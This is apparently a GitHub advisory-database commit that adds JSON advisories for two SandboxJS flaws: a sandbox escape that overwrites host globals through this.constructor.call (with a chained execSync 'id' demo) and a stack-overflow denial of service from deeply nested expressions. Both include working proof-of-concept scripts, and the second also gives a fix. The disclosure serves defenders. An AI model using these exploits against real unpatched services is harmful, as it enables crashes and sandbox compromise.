Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit c57265dd75b9 · 2026-04-03T21:46:57.000Z
GHSA-2gg9-6p7w-6cpj GHSA-8pfc-jjgw-6g26 GHSA-hg73-4w7g-q96w
diff --git a/advisories/github-reviewed/2026/04/GHSA-2gg9-6p7w-6cpj/GHSA-2gg9-6p7w-6cpj.json b/advisories/github-reviewed/2026/04/GHSA-2gg9-6p7w-6cpj/GHSA-2gg9-6p7w-6cpj.json
@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2gg9-6p7w-6cpj",
+  "modified": "2026-04-03T21:44:39Z",
+  "published": "2026-04-03T21:44:39Z",
+  "aliases": [
+    "CVE-2026-34208"
+  ],
+  "summary": "SandboxJS: Sandbox integrity escape ",
+  "details": "### Summary\nSandboxJS blocks direct assignment to global objects (for example `Math.random = ...`), but this protection can be bypassed through an exposed callable constructor path: `this.constructor.call(target, attackerObject)`. Because `this.constructor` resolves to the internal `SandboxGlobal` function and `Function.prototype.call` is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process.\n\n### Details\nThe intended safety model relies on write-time checks in assignment operations. In `assignCheck`, writes are denied when the destination is marked global (`obj.isGlobal`), which correctly blocks straightforward payloads like `Math.random = () => 1`.\n\nReference: [`src/executor.ts#L215-L218`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/executor.ts#L215-L218)\n\n```ts\nif (obj.isGlobal) {\n  throw new SandboxAccessError(\n    `Cannot ${op} property '${obj.prop.toString()}' of a global object`,\n  );\n}\n```\n\nThe bypass works because the dangerous write is not performed by an assignment opcode. Instead, attacker code reaches a host callable that performs writes internally. The constructor used for sandbox global objects is `SandboxGlobal`, implemented as a function that copies all keys from a provided object into `this`.\n\nReference: [`src/utils.ts#L84-L88`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/utils.ts#L84-L88)\n\n```ts\nexport const SandboxGlobal = function SandboxGlobal(this: ISandboxGlobal, globals: IGlobals) {\n  for (const i in globals) {\n    this[i] = globals[i];\n  }\n} as any as SandboxGlobalConstructor;\n```\n\nAt runtime, global scope `this` is a `SandboxGlobal` instance (`functionThis`), so `this.constructor` resolves to `SandboxGlobal`. That constructor is reachable from sandbox code, and calls through `Function.prototype.call` are allowed by the generic call opcode path.\n\nReferences:\n- [`src/utils.ts#L118-L126`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/utils.ts#L118-L126)\n- [`src/executor.ts#L493-L518`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/executor.ts#L493-L518)\n\n```ts\nconst sandboxGlobal = new SandboxGlobal(options.globals);\n...\nglobalScope: new Scope(null, options.globals, sandboxGlobal),\n```\n\n```ts\nconst evl = context.evals.get(obj.context[obj.prop] as any);\nlet ret = evl ? evl(obj.context[obj.prop], ...vals) : (obj.context[obj.prop](...vals) as unknown);\n```\n\nThis creates a privilege gap:\n1. Direct global mutation is blocked in assignment logic.\n2. A callable host function that performs arbitrary property writes is still reachable.\n3. The call path does not enforce equivalent global-mutation restrictions.\n4. Attacker-controlled code can choose the write target (`Math`, `JSON`, etc.) via `.call(target, payloadObject)`.\n\nIn practice, the payload:\n```js\nconst SG = this.constructor;\nSG.call(Math, { random: () => 'pwned' });\n```\noverwrites host `Math.random` successfully. The mutation is visible immediately in host runtime and in fresh sandbox instances, proving cross-context persistence and sandbox boundary break.\n\n### PoC\nInstall dependency:\n\n```bash\nnpm i @nyariv/sandboxjs@0.8.35\n```\n\n#### Global write bypass with `pwned` marker\n\n```js\n#!/usr/bin/env node\n'use strict';\n\nconst Sandbox = require('@nyariv/sandboxjs').default;\nconst run = (code) => new Sandbox().compile(code)().run();\nconst original = Math.random;\n\ntry {\n  try {\n    run('Math.random = () => 1');\n    console.log('Without bypass (direct assignment): unexpectedly succeeded');\n  } catch (err) {\n    console.log('Without bypass (direct assignment): blocked ->', err.message);\n  }\n  run(`this.constructor.call(Math, { random: () => 'pwned' })`);\n  console.log('With bypass (host Math.random()):', Math.random());\n  console.log('With bypass (fresh sandbox Math.random()):', run('return Math.random()'));\n} finally {\n  Math.random = original;\n}\n```\n\nExpected output:\n\n```\nWithout bypass (direct assignment): blocked -> Cannot assign property 'random' of a global object\nWith bypass (host Math.random()): pwned\nWith bypass (fresh sandbox Math.random()): pwned\n```\n\n`With bypass (host Math.random())` proves the sandbox changed host runtime state immediately.  \n`With bypass (fresh sandbox Math.random())` proves the mutation persists across new sandbox instances, which shows cross-execution contamination.\n\n#### Command `id` execution via host gadget\n\nThis second PoC demonstrates exploitability when host code later uses a mutated global property in a sensitive sink. It uses the POSIX `id` command as a harmless execution marker.\n\n```js\n#!/usr/bin/env node\n'use strict';\n\nconst Sandbox = require('@nyariv/sandboxjs').default;\nconst { execSync } = require('child_process');\n\nconst run = (code) => new Sandbox().compile(code)().run();\nconst hadCmd = Object.prototype.hasOwnProperty.call(Math, 'cmd');\nconst originalCmd = Math.cmd;\n\ntry {\n  try {\n    run(`Math.cmd = 'id'`);\n    console.log('Without bypass (direct assignment): unexpectedly succeeded');\n  } catch (err) {\n    console.log('Without bypass (direct assignment): blocked ->', err.message);\n  }\n  run(`this.constructor.call(Math, { cmd: 'id' })`);\n  console.log('With bypass (host command source Math.cmd):', Math.cmd);\n  console.log(\n    'With bypass + host gadget execSync(Math.cmd):',\n    execSync(Math.cmd, { encoding: 'utf8' }).trim(),\n  );\n} finally {\n  if (hadCmd) {\n    Math.cmd = originalCmd;\n  } else {\n    delete Math.cmd;\n  }\n}\n```\n\nExpected output:\n\n```\nWithout bypass (direct assignment): blocked -> Cannot assign property 'cmd' of a global object\nWith bypass (host command source Math.cmd): id\nWith bypass + host gadget execSync(Math.cmd): uid=1000(mk0) gid=1000(mk0) groups=1000(mk0),...\n```\n\n### Impact\nThis is a sandbox integrity escape. Untrusted code can mutate host shared global objects despite explicit global-write protections. Because these mutations persist process-wide, exploitation can poison behavior for other requests, tenants, or subsequent sandbox runs. Depending on host application usage of mutated built-ins, this can be chained into broader compromise, including control-flow hijack in application logic that assumes trusted built-in behavior.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@nyariv/sandboxjs"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.8.36"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/nyariv/SandboxJS"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-693",
+      "CWE-915"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-03T21:44:39Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-8pfc-jjgw-6g26/GHSA-8pfc-jjgw-6g26.json b/advisories/github-reviewed/2026/04/GHSA-8pfc-jjgw-6g26/GHSA-8pfc-jjgw-6g26.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8pfc-jjgw-6g26",
+  "modified": "2026-04-03T21:45:14Z",
+  "published": "2026-04-03T21:45:14Z",
+  "aliases": [
+    "CVE-2026-34211"
+  ],
+  "summary": "SandboxJS: Stack overflow DoS via deeply nested expressions in recursive descent parser",
+  "details": "## Summary\n\nThe `@nyariv/sandboxjs` parser contains unbounded recursion in the `restOfExp` function and the `lispify`/`lispifyExpr` call chain. An attacker can crash any Node.js process that parses untrusted input by supplying deeply nested expressions (e.g., ~2000 nested parentheses), causing a `RangeError: Maximum call stack size exceeded` that terminates the process.\n\n## Details\n\nThe root cause is in `src/parser.ts`. The `restOfExp` function (line 443) iterates through expression characters, and when it encounters a closing bracket that doesn't match the expected `firstOpening`, it recursively calls itself at line 503:\n\n```typescript\n// src/parser.ts:486-505\n} else if (closings[char]) {\n  // ...\n  if (char === firstOpening) {\n    done = true;\n    break;\n  } else {\n    const skip = restOfExp(constants, part.substring(i + 1), [], char);  // line 503\n    cache.set(skip.start - 1, skip.end);\n    i += skip.length + 1;\n  }\n}\n```\n\nEach nested bracket (`(`, `[`, `{`) adds a stack frame. There is no depth counter or limit check. The function signature has no depth parameter:\n\n```typescript\nexport function restOfExp(\n  constants: IConstants,\n  part: CodeString,\n  tests?: RegExp[],\n  quote?: string,\n  firstOpening?: string,\n  closingsTests?: RegExp[],\n  details: restDetails = {},\n): CodeString {\n```\n\nA second unbounded recursive path exists through `lispify` → `lispTypes.get(type)` → `group` handler → `lispifyExpr` (line 672) → `lispify`, which processes parenthesized groups recursively with no depth limit.\n\nAll public API methods (`Sandbox.parse()`, `Sandbox.compile()`, `Sandbox.compileAsync()`, `Sandbox.compileExpression()`, `Sandbox.compileExpressionAsync()`) pass user input directly to `parse()` with no input validation or depth limiting.\n\nA `RangeError: Maximum call stack size exceeded` in Node.js is not a catchable exception in the normal sense — it crashes the current execution context and, in a server handling requests synchronously, can crash the entire process.\n\n## PoC\n\n```bash\n# Install the package\nnpm install @nyariv/sandboxjs\n\n# Create test file\ncat > poc.js << 'EOF'\nconst { default: Sandbox } = require('@nyariv/sandboxjs');\nconst s = new Sandbox();\n\n// Trigger via nested parentheses\nconsole.log(\"Testing nested parentheses...\");\ntry {\n  s.compile('('.repeat(2000) + '1' + ')'.repeat(2000));\n  console.log(\"No crash\");\n} catch(e) {\n  console.log(`Crash: ${e.constructor.name}: ${e.message}`);\n}\n\n// Trigger via nested array brackets\nconsole.log(\"Testing nested array brackets...\");\ntry {\n  s.compile('a' + '[0]'.repeat(2000));\n  console.log(\"No crash\");\n} catch(e) {\n  console.log(`Crash: ${e.constructor.name}: ${e.message}`);\n}\nEOF\n\nnode poc.js\n```\n\n**Expected output:**\n```\nTesting nested parentheses...\nCrash: RangeError: Maximum call stack size exceeded\nTesting nested array brackets...\nCrash: RangeError: Maximum call stack size exceeded\n```\n\nVerified on Node.js v22 with `@nyariv/sandboxjs@0.8.35`.\n\n## Impact\n\nAny application using `@nyariv/sandboxjs` to parse untrusted user input is vulnerable to denial of service. Since SandboxJS is explicitly designed to safely execute untrusted JavaScript, its primary use case involves untrusted input — making this a high-impact vulnerability for its intended deployment scenario.\n\nAn attacker can crash the host Node.js process with a single crafted input string. In server-side applications, this causes complete service disruption. The attack payload is trivial to construct and requires no authentication.\n\n## Recommended Fix\n\nAdd a `depth` parameter to `restOfExp` and throw a `ParseError` when a maximum depth is exceeded:\n\n```typescript\n// src/parser.ts - restOfExp function\nconst MAX_PARSE_DEPTH = 256;\n\nexport function restOfExp(\n  constants: IConstants,\n  part: CodeString,\n  tests?: RegExp[],\n  quote?: string,\n  firstOpening?: string,\n  closingsTests?: RegExp[],\n  details: restDetails = {},\n  depth: number = 0,          // ADD depth parameter\n): CodeString {\n  if (depth > MAX_PARSE_DEPTH) {\n    throw new ParseError('Expression nesting depth exceeded', part.toString());\n  }\n  // ... existing code ...\n\n  // At line 503, pass depth + 1:\n  const skip = restOfExp(constants, part.substring(i + 1), [], char, undefined, undefined, {}, depth + 1);\n\n  // At line 480 (template literal), also pass depth + 1:\n  const skip = restOfExp(constants, part.substring(i + 2), [], '{', undefined, undefined, {}, depth + 1);\n}\n```\n\nSimilarly, add depth tracking to `lispify` and `lispifyExpr`:\n\n```typescript\nfunction lispify(\n  constants: IConstants,\n  part: CodeString,\n  expected?: readonly string[],\n  lispTree?: Lisp,\n  topLevel = false,\n  depth: number = 0,         // ADD depth parameter\n): Lisp {\n  if (depth > MAX_PARSE_DEPTH) {\n    throw new ParseError('Expression nesting depth exceeded', part.toString());\n  }\n  // ... pass depth + 1 to recursive lispify/lispifyExpr calls ...\n}\n```",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@nyariv/sandboxjs"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.8.36"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.8.35"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/nyariv/SandboxJS"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-674"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-03T21:45:14Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-hg73-4w7g-q96w/GHSA-hg73-4w7g-q96w.json b/advisories/github-reviewed/2026/04/GHSA-hg73-4w7g-q96w/GHSA-hg73-4w7g-q96w.json
